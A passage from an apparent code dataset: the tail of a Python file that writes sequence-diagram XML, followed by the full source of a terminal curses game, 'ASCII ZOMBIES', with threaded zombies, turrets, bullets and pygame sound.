EmptyOptionalFragment\n\n def lifeline_exists(self, name):\n for i in self.lifelines:\n if i.name == name:\n return True\n\n return False\n\n def sequence_diagram_exists(self, name):\n for i in self.sequence_diagrams:\n if i.name == name:\n return True\n\n return False\n\n def create_single_sequence_diagram(self, sequence_diagram):\n self.sequence_diagrams.append(sequence_diagram)\n\n def create_lifelines_xml(self, f):\n f.write(\"\\t\\n\")\n\n for lifeline in self.lifelines:\n lifeline.lifeline_to_xml(f)\n\n f.write(\"\\t\\n\")\n\n def create_fragments_xml(self, f):\n f.write(\"\\t\\n\")\n\n for fragment in self.fragments:\n fragment.fragments_to_xml(f)\n\n f.write(\"\\t\\n\")\n\n def create_sequence_diagrams_xml(self, f):\n for diagram in self.sequence_diagrams:\n\n m_count = 0\n f_count = 0\n\n f.write(\n \"\\t\\n\".format(\n diagram.name, diagram.guard\n )\n )\n\n for i in diagram.elements:\n\n if i == 0:\n diagram.xml_message_by_position(m_count, f)\n m_count += 1\n\n elif i == 1:\n diagram.xml_fragment_by_position(f_count, f)\n f_count += 1\n\n f.write(\"\\t\\n\")\n\n def create_xml(self, activity):\n f = open(\"sequence_diagram_activity_{}.xml\".format(activity), \"w\")\n\n f.write(\"\\n\")\n\n self.create_lifelines_xml(f)\n self.create_fragments_xml(f)\n self.create_sequence_diagrams_xml(f)\n\n f.write(\"\\n\")\n\n f.close()\n","sub_path":"src/sequence/sequence_diagrams.py","file_name":"sequence_diagrams.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"614548726","text":"import curses\nimport random\nimport sys\nimport threading\nfrom threading import Thread\nimport time\nimport subprocess\nimport queue\nfrom random import randint\nimport math\n# $ python3.7 -m pip install pygame\nimport pygame #make sure we can install on user's computers.. {maybe do an install from source for deployment!}\nfrom pygame.locals import *\nfrom pygame import mixer\nimport numpy as np #non stl.. 
$ pip3 install numpy # $python3.7 -m pip install numpy\n\n\n####### #######\n\n#premature optimization is the root of all evil!\n\n\n####### ########\n\n\n####### INITILIZATIONZ ###########\n\ns = curses.initscr()\ncurses.curs_set(0)\nsh, sw = s.getmaxyx() #TODO CREATE A SET SCREEN SIZE.\nwindow = curses.newwin(sh, sw, 0, 0)\nbarWindow = curses.newwin(sh//4, sw//4, 5, 5)\n\nwindow.nodelay(True) #does this actually work?\nbarWindow.nodelay(True)\n\nwindow.keypad(1) #What does this do?\nbarWindow.keypad(1)\n\ncurses.start_color()\ncurses.noecho()\n\ntime_start = time.time()\nlast_time_fired = time.time()\nhero_func_first_run = 1\nzomb_func_first_run = 1\n\nwindow.border(0)\nwindow.timeout(100) #and this?\n\n#the pygame init function was causing a lot of errors\n#pygame.mixer.init(44100, -16,2,2048) #I dunno what all these numbers do.. but it makes the sound work! :P\nmixer.init()\n\nold_health = 3\nold_points = 10\n#old_health_bar = \"❤\" * old_health\nbullet_row = 1\nbullet_col = 1\n####### ###########\n\nclass finishLine:\n row0 = \" E +\"\n row1 = \" E +\"\n row2 = \" E +\"\n row3 = \" E +\"\n row4 = \" E +\"\n row5 = \" E +\"\n row6 = \" E +\"\n row7 = \" E +\"\n row8 = \" R +\"\n rows = [row0, row1, row2, row3, row4, row5, row6, row7, row8]\n num_rows_or_height = 9\n width_or_length = 5\n\n\nclass turret:\n\n col = 0\n row = 0\n health = 10\n\n facing_up_ln1 = \"++||++\"\n facing_up_ln2 = \"+ [] +\"\n facing_up_ln3 = \"++++++\"\n \n facing_down_ln1 = \"++++++\"\n facing_down_ln2 = \"+ [] +\"\n facing_down_ln3 = \"++||++\"\n \n facing_right_ln1 = \"++++++\"\n facing_right_ln2 = \"+ I===\"\n facing_right_ln3 = \"++++++\"\n\n facing_left_ln1 = \"++++++\"\n facing_left_ln2 = \"===I +\"\n facing_left_ln3 = \"++++++\"\n\n len_of_row = 6\n\nclass hero:\n col = 0\n row = 0\n health = 3\n points = 0\n\n spriteRest = \"┌(ᶱ1ᶱ)┐\"\n\n spriteMove1 = \"┌(ᶱ1ᶱ)┘\"\n spriteMoveFired1 = \"┌(ᶱ.ᶱ)┘\"\n\n spriteMove2 = \"└(ᶱ1ᶱ)┐\"\n spriteMoveFired2 = \"└(ᶱ.ᶱ)┐\"\n len_of_sprite = 7 #UPDATE IF MORE SPRITES COME\n\n hero_sprite_type = 1\n\n\n\nclass zombie:\n col = sw - (sw // 20)\n row = 0\n\n zombie_sprite_left_attack_head ='~{#_#}'\n zombie_sprite_right_attack_head ='{#_#}~' #TODO make bodies too and implement\n \n zombie_sprite_head = \"{#_#}\"\n zombie_sprite_body = '(o)'\n\n len_of_row0 = 5\n len_of_row1 = 3\n offset_of_row1 = 1\n zombie_ID = 1\n alive = True\n\nclass environment:\n lock = threading.Lock()\n player = hero() \n zombie_list = list()\n hero_sprite = ''\n turrets = list()\n playerTurret = turret()\n turret_queue = queue.Queue()\n bullet_queue = queue.Queue()\n checkerboard = np.zeros((sh,sw),dtype=int) \n\n #0 for nothing there, -1 for player, -10 to -20 for turret, -5 for walls,\n # 1 to inf correspond to zombos, -99 is finish line\n\ndef draw_finish_line(env):\n \n pos = [sh//2 + finishLine.num_rows_or_height//2, 1 ]\n \n for x in range(0, finishLine.num_rows_or_height):\n for i in range(0,finishLine.width_or_length):\n env.checkerboard[pos[0]-x][pos[1]+i] = -99\n window.addstr(pos[0]-x,pos[1], finishLine.rows[x])\n\n\ndef create_bounds(env):\n for col in range(0,sw):\n env.checkerboard[0][col] = -5\n env.checkerboard[sh-1][col] = -5\n \n for row in range(0,sh):\n env.checkerboard[row][0] = -5\n env.checkerboard[row][sw-1] = -5\n \n\ndef dynamic_print(timeSpan, x, y, text, color):\n\n tempX = x\n\n for i in range(len(text)):\n window.addstr(y, tempX, text[i], curses.color_pair(color))\n window.refresh()\n time.sleep(timeSpan)\n tempX+=1\n\n\ndef boundError(x, y):\n\n if(x > sw or y > 
sh):\n print(\"Values are not within bounds\")\n return True\n\n return False\n\ndef drawHealthBar(x, y, health):\n\n global old_health\n #global old_health_bar\n\n if(health != old_health):\n\n old_health_bar = \"❤ \" * old_health\n clear_sprite(y, x + 8, old_health_bar)\n old_health = health\n\n if(not boundError(x, y)):\n window.addstr(y, x, \"Health: \", curses.A_BOLD)\n\n if(not boundError(x + 8, y)):\n \n RED_TEXT = 1\n curses.init_pair(RED_TEXT, curses.COLOR_RED, curses.COLOR_BLACK)\n\n bar = \"❤ \" * health\n # old_health_bar = bar\n window.addstr(y, x + 8, bar, curses.color_pair(RED_TEXT))\n\ndef drawPointBar(x, y, points):\n\n global old_points\n\n if(points != old_points):\n\n old_points_bar = \"$ \" * old_points\n clear_sprite(y, x + 8, old_points_bar)\n old_points = points\n\n if(not boundError(x, y)):\n window.addstr(y, x, \"Points: \", curses.A_BOLD)\n\n if(not boundError(x + 8, y)):\n \n YELLOW_TEXT = 2\n curses.init_pair(YELLOW_TEXT, curses.COLOR_YELLOW, curses.COLOR_BLACK)\n\n bar = \"$ \" * points\n window.addstr(y, x + 8, bar, curses.color_pair(YELLOW_TEXT))\n\ndef init_map(env, lock):\n env.lock = lock\n \n hero_x = sw // 4\n hero_y = sh // 2\n\n env.player.row = hero_y\n env.player.col = hero_x\n\n #starting with 3 zombies \n # ATTENTION: zombie ID in zombie class initialize is 1\n # Since all the zombie >=1\n for i in range (0,3):\n eachZombie = zombie()\n eachZombie.zombie_ID = i + 1\n eachZombie.row = randint(0,sh - (sh // 5)) # create zombie at random position\n eachZombie.col = randint(sw - (sw // 10),sw - (sw // 20))\n env.zombie_list.append(eachZombie) \n\n #sets the initial sprite for the player\n env.hero_sprite = env.player.spriteRest\n\n draw_finish_line(env)\n create_bounds(env)\n \n\ndef display_intro_message():\n\n song = mixer.Sound('ost_1_SQ.wav') #works!\n song.play()\n\n YELLOW_TEXT = 1\n RED_TEXT = 2\n\n scale = 0.15 #time scale\n\n curses.init_pair(YELLOW_TEXT, curses.COLOR_YELLOW, curses.COLOR_BLACK)\n\n dynamic_print(0.2*scale,(sw // 2) - 15, (sh // 2) - 5, \"Sudochad Stud|os presents ...\", YELLOW_TEXT)\n time.sleep(3*scale)\n dynamic_print(0.1*scale, (sw // 2) - 15, (sh // 2) - 5, \" \", YELLOW_TEXT)\n \n curses.init_pair(RED_TEXT, curses.COLOR_RED, curses.COLOR_BLACK)\n dynamic_print(0.5*scale, (sw // 2) - 10, (sh // 2), \"ASCII ZOMBIES\", RED_TEXT)\n time.sleep(2*scale)\n dynamic_print(0.05*scale, (sw // 2) - 10, (sh // 2), \" \", RED_TEXT)\n\n\ndef display_title():\n\n sys.stdout.flush()\n \n crash_sound = pygame.mixer.Sound(\"crash.wav\")\n pygame.mixer.Sound.play(crash_sound)\n\n pygame.mixer.music.load('jazz.wav') #works!\n pygame.mixer.music.play(-1)\n \n text = \"Sudochad Stud|os presents...\"\n for character in text:\n print(character, end = \"\")\n time.sleep(0.125) #sexy but too slow for debugging\n #time.sleep(.03)\n sys.stdout.flush()\n time.sleep(.12)\n\n## should be run inside a locked function body!\ndef place_sprite(y, x, sprite):\n if y < sh and y >= 0:\n if x < sw and x >= 0:\n window.addstr(int(y),int(x), sprite)\n\n## should be run inside a locked function body!\ndef clear_sprite(y, x, sprite):\n\n space = \" \" * len(sprite)\n if y < sh and y >= 0:\n if x < sw and x >= 0:\n window.addstr(int(y),int(x), space)\n # str_size = len(sprite)\n # spaces_str = \"\"\n # for i in (0,str_size):\n # spaces_str += \" \"\n\n\ndef move_hero(env, keypress):\n\n global last_time_fired\n \n global hero_func_first_run\n \n env.lock.acquire() ####### (;\n\n key = keypress\n\n bulletFired = False\n \n old_pos = [env.player.row, 
env.player.col]\n    new_pos = [env.player.row, env.player.col]\n    \n    if key == curses.KEY_DOWN:\n        new_pos = [env.player.row + 1, env.player.col]\n    \n    elif key == curses.KEY_UP:\n        new_pos = [env.player.row - 1, env.player.col]\n    \n    elif key == curses.KEY_LEFT:\n        new_pos = [env.player.row, env.player.col - 1]\n    \n    elif key == curses.KEY_RIGHT:\n        new_pos = [env.player.row, env.player.col + 1]\n    \n    place_if_valid(env,old_pos,new_pos,-1)\n    \n\n    if key == ord('d') or key == ord('D') or key == ord('a') or key == ord('A') or key == ord('s') or key == ord('S') or key == ord('w') or key == ord('W'):\n        bulletFired = True\n        # drawExplosion(bullet_row, bullet_col)\n        if(time.time() > (last_time_fired)+ 0.3):\n            last_time_fired = time.time()\n            if key == ord('d') or key == ord('D'):\n                bullet_info = [new_pos,'right','•'] #WARNING, IF YOU CHANGE THE BULLET CHARACTERS, YOU'LL BREAK THE POINTS\n                env.bullet_queue.put(bullet_info)\n            elif key == ord('a') or key == ord('A'):\n                bullet_info = [new_pos,'left','•']\n                env.bullet_queue.put(bullet_info)\n            elif key == ord('w') or key == ord('W'):\n                bullet_info = [new_pos,'up','•']\n                env.bullet_queue.put(bullet_info)\n            elif key == ord('s') or key == ord('S'):\n                bullet_info = [new_pos,'down','•']\n                env.bullet_queue.put(bullet_info)\n    \n    if env.player.points >= 10:\n        window.addstr((sh // 2) - ((sh // 2) - 2), (sw // 2) - ((sw // 2) - 30), \"Press E to build a turret\", curses.A_BLINK)\n\n    if key == ord('e'):\n        clear_sprite((sh // 2) - ((sh // 2) - 2), (sw // 2) - ((sw // 2) - 30), \"Press E to build a turret\")\n        env.turrets.append(turret())\n        env.turrets[-1].row = env.player.row\n        env.turrets[-1].col = env.player.col + 10\n        place_turret(env.turrets[-1].col, env.turrets[-1].row, \"up\", env)\n\n        env.player.points -= 10\n\n    elif key == ord('i'):\n        env.player.points+=1\n    \n    if env.player.hero_sprite_type == 1:\n        if bulletFired:\n            env.hero_sprite = env.player.spriteMoveFired1\n        else:\n            env.hero_sprite = env.player.spriteMove1\n    elif env.player.hero_sprite_type == 2:\n        if bulletFired:\n            env.hero_sprite = env.player.spriteMoveFired2\n        else:\n            env.hero_sprite = env.player.spriteMove2\n\n        env.player.hero_sprite_type = 0\n    \n    env.player.hero_sprite_type+=1\n    env.lock.release() \n\ndef move_baddies(env, counter, timeValue):\n    \"\"\"\n    This function is run in a separate thread. 
It will move\n all the zombie into the new location.\n \"\"\"\n\n while(1):\n env.lock.acquire()\n\n newZombies = 0\n if (counter == 10):\n newZombies = int (math.e ** (timeValue/5))\n counter = 0\n timeValue += 1\n\n i = 0\n for i in range (0,newZombies):\n eachZombie = zombie()\n eachZombie.zombie_ID = len(env.zombie_list) + 1\n eachZombie.row = randint(0,sh - (sh // 5)) # create zombie at random position\n eachZombie.col = randint(sw - (sw // 10),sw - (sw // 20))\n env.zombie_list.append(eachZombie) \n\n #target = [env.player.row, env.player.col+2] # + 2 for near middle of hero's body\n target = [sh//2 + finishLine.num_rows_or_height//2, 1 ]\n\n for each_zombie in env.zombie_list:\n if each_zombie.alive:\n\n if(random.randint(1,10)==1):\n target = [env.player.row, env.player.col+2] # + 2 for near middle of hero's body\n\n if each_zombie.row < target[0] and random.randint(1,10) > 2:\n new_pos = [each_zombie.row+1,each_zombie.col]\n old_pos = [each_zombie.row,each_zombie.col]\n place_if_valid(env,old_pos,new_pos, each_zombie.zombie_ID)\n #elif each_zombie.row > target[0]:\n else:\n new_pos = [each_zombie.row-1,each_zombie.col]\n old_pos = [each_zombie.row,each_zombie.col]\n place_if_valid(env,old_pos,new_pos, each_zombie.zombie_ID)\n \n\n if each_zombie.col < target[1]:\n new_pos = [each_zombie.row,each_zombie.col+1]\n old_pos = [each_zombie.row,each_zombie.col]\n place_if_valid(env,old_pos,new_pos, each_zombie.zombie_ID)\n \n elif each_zombie.col > target[1]:\n new_pos = [each_zombie.row,each_zombie.col-1]\n old_pos = [each_zombie.row,each_zombie.col]\n place_if_valid(env,old_pos,new_pos, each_zombie.zombie_ID)\n\n if (timeValue > 23):\n timeValue = 23\n\n counter += 1\n env.lock.release()\n time.sleep(0.4) #SPEED UP OR SLOW DOWN THE GAME WITH THIS..LAG FIX OR LAG ++\n\n\ndef fire_turret(env, tur, dir):\n \n if dir == \"right\":\n dist = 30\n for i in range(0,dist):\n env.lock.acquire()\n\n bullet_origin = [tur.row + 1, tur.col + 6]\n bullet_type = '@'\n \n clear_sprite(bullet_origin[0], bullet_origin[1]+i-1, ' ')\n place_sprite(bullet_origin[0], bullet_origin[1]+i, bullet_type)\n bullet_row = bullet_origin[0]\n bullet_col = bullet_origin[1] + i\n \n if( i == dist//2):\n shrapnel_origin = [bullet_row, bullet_col]\n bullet_info = [shrapnel_origin,'up','±']\n bullet_info2 = [shrapnel_origin,'down','±']\n env.bullet_queue.put(bullet_info)\n env.bullet_queue.put(bullet_info2)\n\n if killZombie(env, bullet_row, bullet_col):\n env.player.points -= 1 #no extra points!\n clear_sprite(bullet_origin[0], bullet_origin[1]+i-1, ' ')\n env.lock.release() \n return True\n \n env.lock.release()\n time.sleep(0.02) \n\n elif dir == \"left\":\n dist = 30\n for i in range(0,dist):\n env.lock.acquire()\n\n bullet_origin = [tur.row + 1, tur.col - 2]\n bullet_type = '@'\n \n clear_sprite(bullet_origin[0], bullet_origin[1]-i+1, ' ')\n place_sprite(bullet_origin[0], bullet_origin[1]-i, bullet_type)\n bullet_row = bullet_origin[0]\n bullet_col = bullet_origin[1] - i\n \n if( i == dist//2):\n shrapnel_origin = [bullet_row, bullet_col]\n bullet_info = [shrapnel_origin,'up','±']\n bullet_info2 = [shrapnel_origin,'down','±']\n env.bullet_queue.put(bullet_info)\n env.bullet_queue.put(bullet_info2)\n\n if killZombie(env, bullet_row, bullet_col):\n env.player.points -= 1 #no extra points!\n clear_sprite(bullet_origin[0], bullet_origin[1]-i+1, ' ')\n env.lock.release() \n return True\n \n env.lock.release()\n time.sleep(0.02) \n\n elif dir == \"down\":\n dist = 10\n for i in range(0,dist):\n\n env.lock.acquire()\n\n 
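# The turret sprite spans rows tur.row..tur.row+2 (see place_turret), so the\n            # shell spawns one row below it; col + 3 centres it on the 6-wide sprite.\n            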
bullet_origin = [tur.row + 3, tur.col + 3]\n bullet_type = '@'\n\n clear_sprite(bullet_origin[0]+i-1, bullet_origin[1], ' ')\n place_sprite(bullet_origin[0]+i, bullet_origin[1], bullet_type)\n bullet_row = bullet_origin[0]+i\n bullet_col = bullet_origin[1]\n\n if( i == dist//2):\n shrapnel_origin = [bullet_row, bullet_col]\n bullet_info = [shrapnel_origin,'left','¥']\n bullet_info2 = [shrapnel_origin,'right','¥']\n env.bullet_queue.put(bullet_info)\n env.bullet_queue.put(bullet_info2)\n \n if killZombie(env, bullet_row, bullet_col):\n env.player.points -= 1 #no extra points!\n clear_sprite(bullet_origin[0]+i-1, bullet_origin[1], ' ')\n env.lock.release() \n return True\n\n env.lock.release()\n time.sleep(0.02) \n\n elif dir == \"up\":\n dist = 10\n for i in range(0,dist):\n\n env.lock.acquire()\n\n bullet_origin = [tur.row - 1, tur.col + 3]\n bullet_type = '@'\n\n clear_sprite(bullet_origin[0]-i+1, bullet_origin[1], ' ')\n place_sprite(bullet_origin[0]-i, bullet_origin[1], bullet_type)\n bullet_row = bullet_origin[0]-i\n bullet_col = bullet_origin[1]\n\n if( i == dist//2):\n shrapnel_origin = [bullet_row, bullet_col]\n bullet_info = [shrapnel_origin,'left','¥']\n bullet_info2 = [shrapnel_origin,'right','¥']\n env.bullet_queue.put(bullet_info)\n env.bullet_queue.put(bullet_info2)\n \n if killZombie(env, bullet_row, bullet_col):\n env.player.points -= 1 #no extra points!\n clear_sprite(bullet_origin[0]-i+1, bullet_origin[1], ' ')\n env.lock.release() \n return True\n\n env.lock.release()\n time.sleep(0.02) \n\n\ndef automateTurret2(env):\n\n while 1:\n\n time.sleep(0.75)\n if len(env.turrets) > 0:\n env.lock.acquire()\n for tur in env.turrets:\n \n horiz_targeting_dist = 6+14\n vert_targeting_dist = 3+6\n\n #target right randomly\n if(random.randint(0,1)):\n \n place_turret(tur.col, tur.row, \"right\", env)\n\n for rcols in range(0,horiz_targeting_dist, 4):\n\n if tur.col + rcols < sw :\n if env.checkerboard[tur.row][tur.col + rcols] >= 1:\n env.lock.release()\n fire_turret(env, tur, \"right\")\n env.lock.acquire()\n\n #target left randomly #!\n if(random.randint(0,1)):\n \n place_turret(tur.col, tur.row, \"left\", env)\n\n for lcols in range(0,horiz_targeting_dist, 4):\n\n if tur.col - lcols > 1 :\n if env.checkerboard[tur.row][tur.col - lcols] >= 1:\n env.lock.release()\n fire_turret(env, tur, \"left\")\n env.lock.acquire()\n \n\n #target down randomly\n elif(random.randint(0,1)):\n\n place_turret(tur.col, tur.row, \"down\", env)\n\n for drows in range(0, vert_targeting_dist):\n\n if tur.row + drows < sh:\n if env.checkerboard[tur.row + drows][tur.col] >= 1:\n env.lock.release()\n fire_turret(env, tur, \"down\")\n env.lock.acquire()\n\n #target up randomly\n elif(random.randint(0,1)):\n\n place_turret(tur.col, tur.row, \"up\", env)\n\n for urows in range(0, vert_targeting_dist):\n\n if tur.row - urows > 1:\n if env.checkerboard[tur.row - urows][tur.col] >= 1:\n env.lock.release()\n fire_turret(env, tur, \"up\")\n env.lock.acquire()\n\n env.lock.release()\n\n \ndef place_turret(x, y, direction, env):\n\n for cols in range(0, 6):\n env.checkerboard[y][x+cols] = -10\n env.checkerboard[y+1][x+cols] = -10\n env.checkerboard[y+2][x+cols] = -10\n \n if(direction == \"up\"):\n window.addstr(y, x, env.playerTurret.facing_up_ln1)\n window.addstr(y + 1, x, env.playerTurret.facing_up_ln2)\n window.addstr(y + 2, x, env.playerTurret.facing_up_ln3)\n\n elif(direction == \"down\"):\n window.addstr(y, x, env.playerTurret.facing_down_ln1)\n window.addstr(y + 1, x, env.playerTurret.facing_down_ln2)\n 
window.addstr(y + 2, x, env.playerTurret.facing_down_ln3)\n\n elif(direction == \"left\"):\n window.addstr(y, x, env.playerTurret.facing_left_ln1)\n window.addstr(y + 1, x, env.playerTurret.facing_left_ln2)\n window.addstr(y + 2, x, env.playerTurret.facing_left_ln3)\n\n elif(direction == \"right\"):\n window.addstr(y, x, env.playerTurret.facing_right_ln1)\n window.addstr(y + 1, x, env.playerTurret.facing_right_ln2)\n window.addstr(y + 2, x, env.playerTurret.facing_right_ln3)\n\ndef clear_turret(x, y, direction, env):\n\n clear_sprite(y, x, env.playerTurret.facing_up_ln1)\n clear_sprite(y + 1, x, env.playerTurret.facing_up_ln2)\n clear_sprite(y + 2, x, env.playerTurret.facing_up_ln3)\n \n\ndef verify_player_row(row, col, env, character_ID):\n\n for i in range(0,env.player.len_of_sprite):\n if(env.checkerboard[row][col+i] != 0 and env.checkerboard[row][col+i] != character_ID):\n return False\n return True\n\ndef verify_zombie_rows(row, col, env, offset, character_ID, ZOMBIE): \n \"\"\"\n game over happens thru here. also -\n This function verifies if the location is valid to either\n having a new zombie appear in this location or having an\n existing zombie move to this location. The function return\n false for the bad location and true for good location.\n \"\"\"\n for i in range(0,ZOMBIE.len_of_row0):\n if(env.checkerboard[row][col+i] != 0 and env.checkerboard[row][col+i] != character_ID):\n \n if(env.checkerboard[row][col+i] == -1): #hit the player\n \n env.player.health -= 1\n if(env.player.health < 1):\n game_over()\n\n elif(env.checkerboard[row][col+i] == -99):\n game_over()\n \n return False\n \n for i in range(0,ZOMBIE.len_of_row1):\n if(env.checkerboard[row+1][col+i+offset] != 0 and env.checkerboard[row+1][col+i+offset] != character_ID ):\n \n if(env.checkerboard[row][col+i] == -1): #hit the player\n \n env.player.health -= 1\n if(env.player.health < 1):\n game_over()\n\n elif(env.checkerboard[row][col+i] == -99):\n game_over()\n\n return False\n\n return True\n\n\ndef clear_player_row(row, col, env):\n\n for i in range(0,env.player.len_of_sprite):\n env.checkerboard[row][col+i] = 0\n window.addch(row, col + i, ' ')\n\ndef clear_zombie_rows(row, col, env, offset, ZOMBIE):\n \"\"\"\n This function take in the old location of the zombie\n and clear it.\n \"\"\"\n for i in range(0,ZOMBIE.len_of_row0):\n env.checkerboard[row][col+i] = 0\n window.addch(row, col + i, ' ')\n \n for i in range(0,ZOMBIE.len_of_row1):\n env.checkerboard[row+1][col+i+offset] = 0\n window.addch(row+1, col + i + offset, ' ')\n\ndef place_player(row, col, env):\n\n for i in range(0,env.player.len_of_sprite):\n env.checkerboard[row][col+i] = -1\n window.addch(row, col + i, env.hero_sprite[i])\n \n################################################ Finish Changing ######################################\n\ndef place_zombie_rows(row, col, offset, env, character_ID, ZOMBIE):\n \"\"\"\n This function will place the zombie into the new location\n \"\"\"\n for i in range(0,ZOMBIE.len_of_row0):\n env.checkerboard[row][col+i] = character_ID\n window.addch(row, col+i, ZOMBIE.zombie_sprite_head[i])\n \n for i in range(0,ZOMBIE.len_of_row1):\n env.checkerboard[row+1][col+i+offset] = character_ID\n window.addch(row+1, col+i+offset, ZOMBIE.zombie_sprite_body[i])\n\n################################################ Finish Changing ######################################\n\n#character ID: zombie = range(1,999), hero = -1 , etc..\ndef place_if_valid(env, old_origin, new_origin, character_ID):\n \n #first check if placement is valid\n 
#then wipe old \n #place new\n newrow = new_origin[0]\n newcol = new_origin[1]\n oldrow = old_origin[0]\n oldcol = old_origin[1]\n \n #Player\n if(character_ID == -1):\n #checks if \n if verify_player_row(newrow, newcol, env, character_ID):\n\n #wipe\n clear_player_row(oldrow, oldcol, env)\n\n #place\n place_player(newrow, newcol, env)\n \n env.player.row = newrow\n env.player.col = newcol\n return True\n else:\n return False\n\n # TODO change baddy to specific zombie\n elif(character_ID >= 1):\n\n offset = 1 #env.zombie.offset_of_row1\n ZOMBIE = env.zombie_list[character_ID - 1] #get the right zombie from the list\n\n if verify_zombie_rows(newrow, newcol, env, offset, character_ID, ZOMBIE):\n\n clear_zombie_rows(oldrow, oldcol, env, offset, ZOMBIE)\n \n place_zombie_rows(newrow, newcol, offset, env, character_ID, ZOMBIE)\n\n ZOMBIE.row = newrow\n ZOMBIE.col = newcol\n return True\n else:\n return False\n\n #Turret\n if(character_ID <= -10 and character_ID >= -20):\n for i in range(0, env.playerTurret.len_of_row):\n env.checkerboard[env.player.row][env.player.col + 10] = character_ID\n \n \ndef drawExplosion(y, x):\n place_sprite(y, x, \"ꙮ\")\n place_sprite(y, x, \"꙰\")\n # time.sleep(0.25)\n # clear_sprite(y, x, \"ꙮ\")\n #clear_sprite(y, x, \"꙰\")\n\n#run in a locked function!\ndef killZombie(env, bullet_row, bullet_col):\n \"\"\"\n This function is to compare the location of bullet vs zombie\n if bullet hits a zombie, it will erase zombie from the board\n and delete zombie from zombie_list\n \"\"\"\n if bullet_row < sh and bullet_row >= 0:\n if bullet_col < sw and bullet_col >= 0:\n zombieID = env.checkerboard[bullet_row][bullet_col]\n if (zombieID >= 1):\n death_zombie = env.zombie_list[zombieID-1]\n death_zombie.alive = False\n clear_zombie_rows(death_zombie.row, death_zombie.col, env, 1, death_zombie)\n env.player.points += 1\n return True\n return False\n\n\ndef fireBullet(env): \n while 1:\n bullet_info = None\n try:\n bullet_info = env.bullet_queue.get_nowait() #this should be fine to do before lock.aquire() ..even though it's odd.\n except:\n pass\n if bullet_info is not None:\n bullet_origin = bullet_info[0]\n bullet_direction = bullet_info[1] \n bullet_type = bullet_info[2] \n # vert_range = 8 \n # horiz_range = 20 \n distance = (sw // 5)\n if(bullet_type == '±'): #for shrapnel!\n distance = 6\n elif(bullet_type == '¥'):\n distance = 3\n for i in range(1,distance):\n env.lock.acquire()\n \n if(bullet_direction == \"right\"):\n clear_sprite(bullet_origin[0], bullet_origin[1]+i-1, ' ')\n place_sprite(bullet_origin[0], bullet_origin[1]+i, bullet_type)\n bullet_row = bullet_origin[0]\n bullet_col = bullet_origin[1] + i\n if killZombie(env, bullet_row, bullet_col):\n if(bullet_type != '•'): #then a turret fired it.\n env.player.points -= 1 #no extra points!\n env.lock.release() \n break\n\n elif(bullet_direction == \"left\"):\n clear_sprite(bullet_origin[0], bullet_origin[1]-i+1, ' ')\n place_sprite(bullet_origin[0], bullet_origin[1]-i, bullet_type)\n bullet_row = bullet_origin[0]\n bullet_col = bullet_origin[1] - i\n if killZombie(env, bullet_row, bullet_col):\n if(bullet_type != '•'): #then a turret fired it.\n env.player.points -= 1 #no extra points!\n env.lock.release() \n break\n\n elif(bullet_direction == \"up\"):\n clear_sprite(bullet_origin[0]-i+1, bullet_origin[1], ' ')\n place_sprite(bullet_origin[0]-i, bullet_origin[1], bullet_type)\n bullet_row = bullet_origin[0] - i\n bullet_col = bullet_origin[1]\n if killZombie(env, bullet_row, bullet_col):\n if(bullet_type != '•'): 
#then a turret fired it.\n env.player.points -= 1 #no extra points!\n env.lock.release() \n break\n\n elif(bullet_direction == \"down\"):\n clear_sprite(bullet_origin[0]+i-1, bullet_origin[1], ' ')\n place_sprite(bullet_origin[0]+i, bullet_origin[1], bullet_type)\n bullet_row = bullet_origin[0] + i\n bullet_col = bullet_origin[1]\n if killZombie(env, bullet_row, bullet_col):\n if(bullet_type != '•'): #then a turret fired it.\n env.player.points -= 1 #no extra points!\n env.lock.release() \n break\n \n \n env.lock.release()\n time.sleep(0.01) \n \n env.lock.acquire()\n if(bullet_direction == \"right\"):\n clear_sprite(bullet_origin[0], bullet_origin[1]+distance-1, ' ')\n elif(bullet_direction == \"left\"):\n clear_sprite(bullet_origin[0], bullet_origin[1]-distance+1, ' ')\n elif(bullet_direction == \"up\"):\n clear_sprite(bullet_origin[0]-distance+1, bullet_origin[1], ' ')\n elif(bullet_direction == \"down\"):\n clear_sprite(bullet_origin[0]+distance-1, bullet_origin[1], ' ')\n env.lock.release()\n \n\ndef game_over():\n window.clear()\n window.addstr(int(sh//2),int(sw//2),\"u lose.\")\n time.sleep(1)\n subprocess.call([\"reset\"])\n quit() \n\n\n\ndef main():\n\n display_intro_message()\n\n env = environment()\n lock = threading.Lock()\n init_map(env, lock)\n\n counter = 0\n timeValue = 0\n \n \n baddies_thread = Thread(target=move_baddies,args=(env, counter, timeValue, ))\n baddies_thread.daemon = True #exit when main exits\n baddies_thread.start() \n\n bullets_thread = Thread(target=fireBullet,args=(env,))\n bullets_thread.daemon = True #exit when main exits\n bullets_thread.start() \n\n #turrets_thread = Thread(target=automateTurret1, args=(env,))\n turrets_thread = Thread(target=automateTurret2, args=(env,))\n turrets_thread.daemon = True #exit when main exits\n turrets_thread.start()\n\n while True: #TODO stop shit from going off screen and breaking the program lol\n key = window.getch() \n if key == ord('p'): \n curses.endwin()\n subprocess.call([\"reset\"])\n quit() # TODO MAKE A PAUSE SCREEN? IF WE HAVE TIME.\n else:\n move_hero(env, key)\n\n #window.border(0)\n\n drawHealthBar((sw // 2) - ((sw // 2) - 1), (sh // 2) - ((sh // 2) - 1), env.player.health)\n drawPointBar((sw // 2) - ((sw // 2) - 1), (sh // 2) - ((sh // 2) - 2), env.player.points)\n\n \n ## DONT FORGET TO JOIN THY THREADS!\n baddies_thread.join()\n bullets_thread.join()\n turrets_thread.join()\n\n curses.endwin()\n subprocess.call([\"reset\"])\n\"\"\"\n\n ◖========8 ############################## leggo baby. 
